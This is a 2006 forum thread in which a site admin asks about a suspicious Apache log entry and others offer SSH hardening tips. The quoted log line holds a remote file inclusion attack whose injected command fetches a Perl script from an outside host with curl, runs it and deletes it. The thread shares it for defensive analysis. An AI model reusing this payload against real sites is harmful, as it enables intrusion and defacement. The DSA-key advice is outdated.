Gowator 0 Report post Posted June 8, 2006 OK deny hosts is now active, can someone give me a go... it would help if you try mub or something as the username so I can see its you.... Quote Share this post Link to post Share on other sites
Gowator 0 Report post Posted June 8, 2006 200.45.94.130 - - [08/Jun/2006:20:20:58 -0400] "GET /glutenfree/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://www.freewebtown.com/carlito2711/www-data.dat?&cmd= cd%20/tmp/;curl%20-O%20http://www.freewebtown.com/carlito2711/prkl.txt; perl%20prkl.txt;rm%20-rf%20prkl.txt*? HTTP/1.0" 200 167 "-" "Mozilla/5.0" What does everyone make of this? [edited by tyme to fix URL issues] Quote Share this post Link to post Share on other sites
tyme 0 Report post Posted June 8, 2006 looks like an attempt to make use of a defacing tool (see here) Quote Share this post Link to post Share on other sites
Gowator 0 Report post Posted June 9, 2006 looks like an attempt to make use of a defacing tool (see here) Thanks tyme, Jeez, you'd think these people would have something else to do other than trying t take down a non-profit website helping people with a medical problem! However got a nice email from a company that had been cracked and was being used as a staging point so at least some good came of it. Quote Share this post Link to post Share on other sites
tyme 0 Report post Posted June 10, 2006 script kiddies are everywhere, and have way too much time on their hands. Quote Share this post Link to post Share on other sites
arthur 0 Report post Posted June 10, 2006 Gowator, why use a password at all? You can disable password logins in sshd, and just carry your RSA key in a USB stick, although you have to be careful with that as well. Also, security by obscurity works against the automated tools that script kiddies use. Recompile SSH to remove the version banner, and make it listen on a non-standard port, since script kiddies always check port 22. hth, Arthur Quote Share this post Link to post Share on other sites
lavaeolus 0 Report post Posted June 20, 2006 I would not use rsa-keys with ssh, better use dsa-keys > ssh-keygen -d will generate a 1024-bit dsa-key for bastille not anymore included in mandriva: it seems that at least some parts went into msec, if you have direct root-login disabled in msec then you will find a file in /etc called Bastille-no-login, this is one of the remnants of mechanisms that went from bastille into msec but yes it would be nice to have a complete bastille-suite delivered with mandriva, since originally bastille was mainly developed with red hat and mandrake in mind, hey Bastille is after all french btw I found some info on their site that they are working on updates for mandriva 2006 Quote Share this post Link to post Share on other sites
